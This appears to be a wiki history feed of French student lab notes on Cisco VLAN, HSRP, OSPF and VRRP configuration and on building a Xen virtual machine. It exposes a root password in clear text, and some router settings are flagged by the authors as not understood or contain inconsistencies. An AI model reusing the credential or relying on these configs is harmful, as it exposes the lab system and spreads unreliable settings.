    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51277</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51277"/>
				<updated>2019-11-28T10:20:57Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Securisation d'un réseau Wi-Fi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
